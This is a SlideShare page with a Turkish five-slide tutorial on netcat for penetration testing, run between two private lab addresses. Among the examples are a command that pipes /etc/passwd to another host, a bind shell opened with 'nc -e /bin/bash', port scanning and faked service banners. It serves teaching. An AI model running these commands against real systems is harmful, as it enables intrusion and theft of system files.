SlideShare ist ein Scribd-Unternehmen logo
1 von 5
Downloaden Sie, um offline zu lesen
1 
NC 
KULLANIMI 
NOT: 
Burada 
sunucu 
ip 
adresi 
olarak 
192.168.37.154, 
istemci 
ip 
adresi 
olarak 
ise 
192.168.37.152 
ip 
adresi 
belirtilmistir. 
Komutlari 
ve 
senaryolari 
kullanirken 
lutfen 
kendi 
sisteminize 
uygun 
ip 
adreslerini 
belirtmeyi 
unutmayiniz. 
Ayni 
sekilde 
kullanilan 
port 
numaralari 
tamamen 
secimliktir. 
Port 
numaralari 
icin 
lutfen 
sisteminizde 
acik 
olmayan 
port 
numaralarinin 
secilmesine 
dikkat 
ediniz. 
Aksi 
takdirde 
beklenilen 
sonuclar 
alinmayabilir. 
Senaryolar 
esnasinda 
Sunucu 
tarafinda 
gerceklestirilmesi 
gereken 
adimlar 
“Sunucu 
-­‐>” 
simgeleri 
ile 
belirtilmistir. 
Ornegin 
Sunucu 
tarafinda 
gerceklestirilmesi 
gereken 
komutun 
nc 
-­‐l 
-­‐p 
3737 
oldugu 
varsayilirsa 
eger, 
bu 
durum 
asagidaki 
sekilde 
ifade 
edilecektir. 
Sunucu 
-­‐> 
# 
nc 
-­‐l 
-­‐p 
3737 
Yani 
buradan 
sunucu 
tarafinda 
“nc 
-­‐l 
-­‐p 
3737” 
komutunun 
calistirilmasi 
gerektigi 
anlasilmaktadir. 
Ayni 
sekilde 
istemci 
tarafinda 
gerceklestirilmesi 
gereken 
bir 
komut 
icin 
belirtim 
“Istemci 
-­‐>” 
seklinde 
olacaktir. 
Ornegin 
Istemci 
tarafinda 
gerceklestirilmesi 
gereken 
komutun 
nc 
192.168.37.154 
3737 
oldugunu 
varsayilirsa 
bu 
durum 
asagidaki 
sekilde 
ifade 
edilecektir. 
Istemci 
-­‐> 
# 
nc 
192.168.37.154 
3737 
Senaryolar 
esnasinda 
komut 
ciktilarinin 
veya 
sunucu 
hizmetlerinin 
verecekleri 
cevaplar 
uzun 
ibareler 
olabilmektedir. 
Bu 
durumda 
sadece 
gerekli 
noktalara 
motivasyonu 
cekebilmek 
adina 
gereksiz 
gorulen 
ciktilar 
icin 
… 
ifadesi 
kullanilabilir. 
Ornegin 
sunucu 
sisteme 
baglanti 
gerceklestirildiginde 
amacin 
sadece 
sunucu 
karsilama 
mesajini 
gostermek 
oldugu 
varsayilirsa 
eger, 
bu 
durum 
asagidaki 
sekilde 
ifade 
edilecektir. 
# 
nc 
192.168.37.154 
3737 
OpenSSH 
2.2.1 
… 
Goruldugu 
gibi 
“…” 
ile 
aslinda 
sunucu 
karsilama 
mesajinin 
ekranda 
gosterilenden 
uzun 
oldugu 
ancak 
icin 
beklenen 
ciktinin 
gosterilmesinin 
yeterli 
oldugu 
anlasilmaktadir.
2 
-­‐ Telnet 
Yaklasimi 
Kullanim 
Telnet 
komutunun 
yaptigi 
isi 
gerceklestirir. 
Hedef 
porta 
baglanti 
saglayarak 
ilgili 
protocol 
uzerinden 
islem 
adimlarini 
gerceklestirmeye 
calisir. 
Asagidaki 
ornekte 
192.168.37.154 
ip 
adresinin 
3737 
portuna 
tcp 
protokolu 
ile 
baglanti 
saglamis 
ve 
hedef 
sisteme 
ait 
sunucu 
mesaji 
goruntulenmistir. 
# nc 192.168.37.154 3737 
SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4 
… 
-­‐ Verbose 
Modu 
Gerceklestirilen 
islemlere 
ait 
daha 
ayrintili 
bilgi 
edinebilmek 
icin 
-­‐v 
parametresi 
kullanilabilir. 
Bu 
parametresinin 
iki 
defa 
kullanilmasi 
ile 
en 
fazla 
verbose 
mesajlari 
alinabilmektedir. 
Asagida 
sunucu 
tarafinda 
3737 
tcp 
portu 
icin 
verbose 
mesajlari 
yapilandirmasi 
gerceklestirilmistir. 
Bu 
sekilde 
baglanti 
gerceklestirildiginde 
ekrana 
olusturulan 
dair 
ayrintili 
mesajlar 
goruntulecektir. 
Sunucu -> # nc –n -v -v -l -p 3737 
“-­‐n” 
parametresi 
ile 
tersine 
ip 
adresi 
cozumlemesinin 
gerceklestirilmemesi 
saglanmaktadir. 
-­‐ Tcp 
Baglantisi 
Olusturma 
Belirtilen 
ip 
adresi 
ve 
port 
numarasi 
icin 
tcp 
baglantisi 
olusturur 
ve 
komut 
bekler. 
Asagidaki 
ornekte 
sunucu 
tafainda 
3737 
portunda 
tcp 
baglantisi 
olusturulur. 
Istemci 
tarafinda 
ise 
olusturulan 
bu 
tcp 
baglantisina 
baglanilarak 
“deneme” 
mesaji 
hedef 
iletilir. 
Sunucu -> # nc –n -l -p 3737 
deneme 
Istemci -> # nc 192.168.37.154 3737 
deneme 
“-­‐n” 
ile 
tersine 
isim 
cozunurlugu 
isleminin 
yapilmamasi 
saglanmistir.
3 
-­‐ Udp 
Baglantisi 
Olusturma 
Belirtilen 
ip 
adresi 
ve 
port 
numarasi 
icin 
udp 
baglantisi 
olusturur 
ve 
komut 
bekler. 
Asagidaki 
ornekte 
sunucu 
tafainda 
3737 
portunda 
udp 
baglantisi 
olusturulur. 
Istemci 
tarafinda 
ise 
olusturulan 
bu 
udp 
baglantisina 
baglanilarak 
“deneme” 
mesaji 
hedef 
iletilir. 
Sunucu -> # nc -n -u -l –p 3737 
deneme 
Istemci -> # nc -u 192.168.1.1 3737 
deneme 
-­‐ Sunucu 
Karsilama 
Mesaji 
Olusturma 
Sunucu 
tarafinda 
olusturulan 
baglantilarda, 
istemci 
sunucu 
servise 
baglanti 
gerceklestirdiginde, 
istemci 
tarafta 
belirtilen 
sunucu 
karsilama 
mesaji 
gorulmektedir. 
Sunucu -> # echo “OpenSSH 2.2.1” | nc -l -p 3737 
Istemci -> # nc 192.168.37.154 3737 
OpenSSH 2.2.1 
Ayni 
durum 
telnet 
komutu 
ilede 
dogrulanabilir. 
Istemci -> # telnet 192.168.37.154 3737 
OpenSSH 2.2.1 
Goruldugu 
gibi 
istemci 
tarafi 
baglantiyi 
gerceklestirdiginde 
ekrana 
sunucu 
system 
uzerinde 
olusturulan 
“OpenSSH 
2.2.1” 
mesaji 
goruntulenmektedir.
4 
-­‐ Port 
Tarama 
Hedef 
sistemdeki 
acik 
portlarin 
belirlemek 
icin 
-­‐z 
parametresi 
kullanilabilir. 
Asagidaki 
ornekte 
192.168.37.154 
ip 
adresindeki 
acik 
portlarin 
tespit 
edilmesi 
saglanmistir. 
Istemci -> # nc -v -n -z 192.168.37.154 22-100 
(UNKNOWN) [192.168.37.152] 80 (http) open 
(UNKNOWN) [192.168.37.152] 25 (smtp) open 
(UNKNOWN) [192.168.37.152] 23 (telnet) open 
(UNKNOWN) [192.168.37.152] 22 (ssh) open 
-­‐n 
parametresi 
ile 
tersine 
isim 
cozunurlugunun 
gerceklestirilmemesi 
saglanmistir. 
-­‐v 
parametresi 
ile 
ayrintili 
mesajlarin 
alinmasi 
saglanmistir. 
Port 
tarama 
isleminin 
udp 
protokolu 
icin 
gerceklestirilmesi 
icin 
–u 
parametresinin 
kullanilmasi 
gerekmektedir. 
Asagida 
duruma 
iliskin 
ornek 
bir 
kullanim 
gosterilmistir. 
# nc -n -v -u 192.168.37.154 53 
(UNKNOWN) [192.168.37.152] 53 (domain) open 
-­‐ Dosya 
Transferi 
Sunucu 
tarafinda 
olusturulan 
baglanti 
> 
ile 
alinandosya.txt 
isimli 
dosyaya 
yonlendirilerek, 
istemci 
tarafindan 
aktarilacak 
olan 
dosya 
iceriginin 
alinmasi 
saglanmistir. 
Sunucu 
ve 
istemci 
tarafli 
gerceklestirilmesi 
gereken 
adimlar 
asagida 
gosterilmistir. 
Sunucu -> # nc -n -l -p 3737 > alinandosya.txt 
Sunucu 
tarafinda 
olusturulan 
baglanti 
netstat 
komutu 
yardimi 
ile 
dogrulanabilir. 
# netstat -nlpt | grep 3737 
tcp 0 0 0.0.0.0:3737 0.0.0.0:* LISTEN 10745/nc 
Istemci 
tarafinda 
ise 
asagidaki 
komut 
calistirilarak 
/etc/passwd 
dosyasinin 
iceriginin 
sunucu 
sisteme 
aktarilmasi 
saglanmaktadir. 
Istemci -> # cat /etc/passwd | nc 192.168.37.154 3737
5 
-­‐ Shell 
Acma 
Sunucu 
sistem 
uzerinde 
nc 
araciligi 
ile 
istemci 
tarafindan 
komut 
calistirilmasi 
saglanabilmektedir. 
Bunun 
icin 
asagidaki 
adimlarin 
uygulanmasi 
gerekmektedir. 
Sunucu -> # nc -e /bin/bash -l -p 3737 
Asagidaki 
sekilde 
istemci 
tarafindan 
calistirilan 
nc 
komutunun 
ardindan 
gerceklestirilen 
baglantinin 
ardindan 
sunucu 
sistem 
uzerinde 
calisitirlan 
ifconfig 
komutunun 
ciktisi 
gorulmektedir. 
Istemci -> # nc 192.168.37.154 3737 
ifconfig 
… 
192.168.37.154 
… 
-­‐ Payload 
Gonderme 
Olusturulan 
payload.txt 
dosyasinin 
icerigi 
asagida 
goruldugu 
gibi 
olmaktadir. 
# cat payload.txt 
GET /twiki/ HTTP/1.0 
Bu 
payload 
bilgisi 
ile 
hedef 
sisteme 
baglanti 
gerceklestirmek 
icin 
asagidaki 
komut 
kullanilmalidir. 
# nc -n -q -v -v 192.168.37.154 80 < payload.txt 
(UNKNOWN) [192.168.37.154] 80 (http) open 
Bu 
islem 
sonunda 
192.168.37.154 
ip 
adresli 
sunucunun 
web 
servisi 
log 
kayitlarinda 
asagidaki 
satir 
goruntulenmistir. 
192.168.37.152 - - [28/Oct/2014:15:12:57 -0400] "GET /twiki/ HTTP/1.0" 400 
323 "-" "-"

Weitere ähnliche Inhalte

Was ist angesagt?

Netscreen Firewallarda DDoS Ayarları
Netscreen Firewallarda DDoS AyarlarıNetscreen Firewallarda DDoS Ayarları
Netscreen Firewallarda DDoS Ayarları
BGA Cyber Security
 
Bilişim Suçlarında IP Adres Analizi
Bilişim Suçlarında IP Adres AnaliziBilişim Suçlarında IP Adres Analizi
Bilişim Suçlarında IP Adres Analizi
BGA Cyber Security
 
Packet-O-Matic:Network Forensic Aracı
Packet-O-Matic:Network Forensic AracıPacket-O-Matic:Network Forensic Aracı
Packet-O-Matic:Network Forensic Aracı
BGA Cyber Security
 
Hping Kullanarak Ağ Keşif Çalışmaları
Hping Kullanarak Ağ Keşif ÇalışmalarıHping Kullanarak Ağ Keşif Çalışmaları
Hping Kullanarak Ağ Keşif Çalışmaları
BGA Cyber Security
 

Was ist angesagt? (20)

Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuNmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
 
Netscreen Firewallarda DDoS Ayarları
Netscreen Firewallarda DDoS AyarlarıNetscreen Firewallarda DDoS Ayarları
Netscreen Firewallarda DDoS Ayarları
 
Python İle Ağ Programlama
Python İle Ağ ProgramlamaPython İle Ağ Programlama
Python İle Ağ Programlama
 
Bilişim Suçlarında IP Adres Analizi
Bilişim Suçlarında IP Adres AnaliziBilişim Suçlarında IP Adres Analizi
Bilişim Suçlarında IP Adres Analizi
 
Nmap Kullanım Kitapçığı
Nmap Kullanım KitapçığıNmap Kullanım Kitapçığı
Nmap Kullanım Kitapçığı
 
Linux 101 - Ağ Temelleri
Linux 101 - Ağ TemelleriLinux 101 - Ağ Temelleri
Linux 101 - Ağ Temelleri
 
Holynix v2
Holynix v2Holynix v2
Holynix v2
 
Temel ag prog_yapilari_mseml
Temel ag prog_yapilari_msemlTemel ag prog_yapilari_mseml
Temel ag prog_yapilari_mseml
 
Packet-O-Matic:Network Forensic Aracı
Packet-O-Matic:Network Forensic AracıPacket-O-Matic:Network Forensic Aracı
Packet-O-Matic:Network Forensic Aracı
 
OpenBSD PAcket Filter DDoS Koruma Özellikleri
OpenBSD PAcket Filter DDoS Koruma ÖzellikleriOpenBSD PAcket Filter DDoS Koruma Özellikleri
OpenBSD PAcket Filter DDoS Koruma Özellikleri
 
FTP ve Güvenlik Duvarları
FTP ve Güvenlik DuvarlarıFTP ve Güvenlik Duvarları
FTP ve Güvenlik Duvarları
 
Syn Flood DDoS Saldırıları
Syn Flood DDoS SaldırılarıSyn Flood DDoS Saldırıları
Syn Flood DDoS Saldırıları
 
Tcpdump ile Trafik Analizi(Sniffing)
Tcpdump ile Trafik Analizi(Sniffing)Tcpdump ile Trafik Analizi(Sniffing)
Tcpdump ile Trafik Analizi(Sniffing)
 
Hping Kullanarak Ağ Keşif Çalışmaları
Hping Kullanarak Ağ Keşif ÇalışmalarıHping Kullanarak Ağ Keşif Çalışmaları
Hping Kullanarak Ağ Keşif Çalışmaları
 
Zmap Hack The Planet
Zmap Hack The PlanetZmap Hack The Planet
Zmap Hack The Planet
 
PORT TARAMA ve KEŞİF ÇALIŞMALARI
PORT TARAMA ve KEŞİF ÇALIŞMALARI PORT TARAMA ve KEŞİF ÇALIŞMALARI
PORT TARAMA ve KEŞİF ÇALIŞMALARI
 
Sizma testi bilgi toplama
Sizma testi bilgi toplamaSizma testi bilgi toplama
Sizma testi bilgi toplama
 
GÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMAGÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMA
 
Siber Güvenlik 2. hafta
Siber Güvenlik 2. haftaSiber Güvenlik 2. hafta
Siber Güvenlik 2. hafta
 
Nmap & Hping
Nmap & HpingNmap & Hping
Nmap & Hping
 

pentest netcat

  • 1. 1 NC KULLANIMI NOT: Burada sunucu ip adresi olarak 192.168.37.154, istemci ip adresi olarak ise 192.168.37.152 ip adresi belirtilmistir. Komutlari ve senaryolari kullanirken lutfen kendi sisteminize uygun ip adreslerini belirtmeyi unutmayiniz. Ayni sekilde kullanilan port numaralari tamamen secimliktir. Port numaralari icin lutfen sisteminizde acik olmayan port numaralarinin secilmesine dikkat ediniz. Aksi takdirde beklenilen sonuclar alinmayabilir. Senaryolar esnasinda Sunucu tarafinda gerceklestirilmesi gereken adimlar “Sunucu -­‐>” simgeleri ile belirtilmistir. Ornegin Sunucu tarafinda gerceklestirilmesi gereken komutun nc -­‐l -­‐p 3737 oldugu varsayilirsa eger, bu durum asagidaki sekilde ifade edilecektir. Sunucu -­‐> # nc -­‐l -­‐p 3737 Yani buradan sunucu tarafinda “nc -­‐l -­‐p 3737” komutunun calistirilmasi gerektigi anlasilmaktadir. Ayni sekilde istemci tarafinda gerceklestirilmesi gereken bir komut icin belirtim “Istemci -­‐>” seklinde olacaktir. Ornegin Istemci tarafinda gerceklestirilmesi gereken komutun nc 192.168.37.154 3737 oldugunu varsayilirsa bu durum asagidaki sekilde ifade edilecektir. Istemci -­‐> # nc 192.168.37.154 3737 Senaryolar esnasinda komut ciktilarinin veya sunucu hizmetlerinin verecekleri cevaplar uzun ibareler olabilmektedir. Bu durumda sadece gerekli noktalara motivasyonu cekebilmek adina gereksiz gorulen ciktilar icin … ifadesi kullanilabilir. Ornegin sunucu sisteme baglanti gerceklestirildiginde amacin sadece sunucu karsilama mesajini gostermek oldugu varsayilirsa eger, bu durum asagidaki sekilde ifade edilecektir. # nc 192.168.37.154 3737 OpenSSH 2.2.1 … Goruldugu gibi “…” ile aslinda sunucu karsilama mesajinin ekranda gosterilenden uzun oldugu ancak icin beklenen ciktinin gosterilmesinin yeterli oldugu anlasilmaktadir.
  • 2. 2 -­‐ Telnet Yaklasimi Kullanim Telnet komutunun yaptigi isi gerceklestirir. Hedef porta baglanti saglayarak ilgili protocol uzerinden islem adimlarini gerceklestirmeye calisir. Asagidaki ornekte 192.168.37.154 ip adresinin 3737 portuna tcp protokolu ile baglanti saglamis ve hedef sisteme ait sunucu mesaji goruntulenmistir. # nc 192.168.37.154 3737 SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4 … -­‐ Verbose Modu Gerceklestirilen islemlere ait daha ayrintili bilgi edinebilmek icin -­‐v parametresi kullanilabilir. Bu parametresinin iki defa kullanilmasi ile en fazla verbose mesajlari alinabilmektedir. Asagida sunucu tarafinda 3737 tcp portu icin verbose mesajlari yapilandirmasi gerceklestirilmistir. Bu sekilde baglanti gerceklestirildiginde ekrana olusturulan dair ayrintili mesajlar goruntulecektir. Sunucu -> # nc –n -v -v -l -p 3737 “-­‐n” parametresi ile tersine ip adresi cozumlemesinin gerceklestirilmemesi saglanmaktadir. -­‐ Tcp Baglantisi Olusturma Belirtilen ip adresi ve port numarasi icin tcp baglantisi olusturur ve komut bekler. Asagidaki ornekte sunucu tafainda 3737 portunda tcp baglantisi olusturulur. Istemci tarafinda ise olusturulan bu tcp baglantisina baglanilarak “deneme” mesaji hedef iletilir. Sunucu -> # nc –n -l -p 3737 deneme Istemci -> # nc 192.168.37.154 3737 deneme “-­‐n” ile tersine isim cozunurlugu isleminin yapilmamasi saglanmistir.
  • 3. 3 -­‐ Udp Baglantisi Olusturma Belirtilen ip adresi ve port numarasi icin udp baglantisi olusturur ve komut bekler. Asagidaki ornekte sunucu tafainda 3737 portunda udp baglantisi olusturulur. Istemci tarafinda ise olusturulan bu udp baglantisina baglanilarak “deneme” mesaji hedef iletilir. Sunucu -> # nc -n -u -l –p 3737 deneme Istemci -> # nc -u 192.168.1.1 3737 deneme -­‐ Sunucu Karsilama Mesaji Olusturma Sunucu tarafinda olusturulan baglantilarda, istemci sunucu servise baglanti gerceklestirdiginde, istemci tarafta belirtilen sunucu karsilama mesaji gorulmektedir. Sunucu -> # echo “OpenSSH 2.2.1” | nc -l -p 3737 Istemci -> # nc 192.168.37.154 3737 OpenSSH 2.2.1 Ayni durum telnet komutu ilede dogrulanabilir. Istemci -> # telnet 192.168.37.154 3737 OpenSSH 2.2.1 Goruldugu gibi istemci tarafi baglantiyi gerceklestirdiginde ekrana sunucu system uzerinde olusturulan “OpenSSH 2.2.1” mesaji goruntulenmektedir.
  • 4. 4 -­‐ Port Tarama Hedef sistemdeki acik portlarin belirlemek icin -­‐z parametresi kullanilabilir. Asagidaki ornekte 192.168.37.154 ip adresindeki acik portlarin tespit edilmesi saglanmistir. Istemci -> # nc -v -n -z 192.168.37.154 22-100 (UNKNOWN) [192.168.37.152] 80 (http) open (UNKNOWN) [192.168.37.152] 25 (smtp) open (UNKNOWN) [192.168.37.152] 23 (telnet) open (UNKNOWN) [192.168.37.152] 22 (ssh) open -­‐n parametresi ile tersine isim cozunurlugunun gerceklestirilmemesi saglanmistir. -­‐v parametresi ile ayrintili mesajlarin alinmasi saglanmistir. Port tarama isleminin udp protokolu icin gerceklestirilmesi icin –u parametresinin kullanilmasi gerekmektedir. Asagida duruma iliskin ornek bir kullanim gosterilmistir. # nc -n -v -u 192.168.37.154 53 (UNKNOWN) [192.168.37.152] 53 (domain) open -­‐ Dosya Transferi Sunucu tarafinda olusturulan baglanti > ile alinandosya.txt isimli dosyaya yonlendirilerek, istemci tarafindan aktarilacak olan dosya iceriginin alinmasi saglanmistir. Sunucu ve istemci tarafli gerceklestirilmesi gereken adimlar asagida gosterilmistir. Sunucu -> # nc -n -l -p 3737 > alinandosya.txt Sunucu tarafinda olusturulan baglanti netstat komutu yardimi ile dogrulanabilir. # netstat -nlpt | grep 3737 tcp 0 0 0.0.0.0:3737 0.0.0.0:* LISTEN 10745/nc Istemci tarafinda ise asagidaki komut calistirilarak /etc/passwd dosyasinin iceriginin sunucu sisteme aktarilmasi saglanmaktadir. Istemci -> # cat /etc/passwd | nc 192.168.37.154 3737
  • 5. 5 -­‐ Shell Acma Sunucu sistem uzerinde nc araciligi ile istemci tarafindan komut calistirilmasi saglanabilmektedir. Bunun icin asagidaki adimlarin uygulanmasi gerekmektedir. Sunucu -> # nc -e /bin/bash -l -p 3737 Asagidaki sekilde istemci tarafindan calistirilan nc komutunun ardindan gerceklestirilen baglantinin ardindan sunucu sistem uzerinde calisitirlan ifconfig komutunun ciktisi gorulmektedir. Istemci -> # nc 192.168.37.154 3737 ifconfig … 192.168.37.154 … -­‐ Payload Gonderme Olusturulan payload.txt dosyasinin icerigi asagida goruldugu gibi olmaktadir. # cat payload.txt GET /twiki/ HTTP/1.0 Bu payload bilgisi ile hedef sisteme baglanti gerceklestirmek icin asagidaki komut kullanilmalidir. # nc -n -q -v -v 192.168.37.154 80 < payload.txt (UNKNOWN) [192.168.37.154] 80 (http) open Bu islem sonunda 192.168.37.154 ip adresli sunucunun web servisi log kayitlarinda asagidaki satir goruntulenmistir. 192.168.37.152 - - [28/Oct/2014:15:12:57 -0400] "GET /twiki/ HTTP/1.0" 400 323 "-" "-"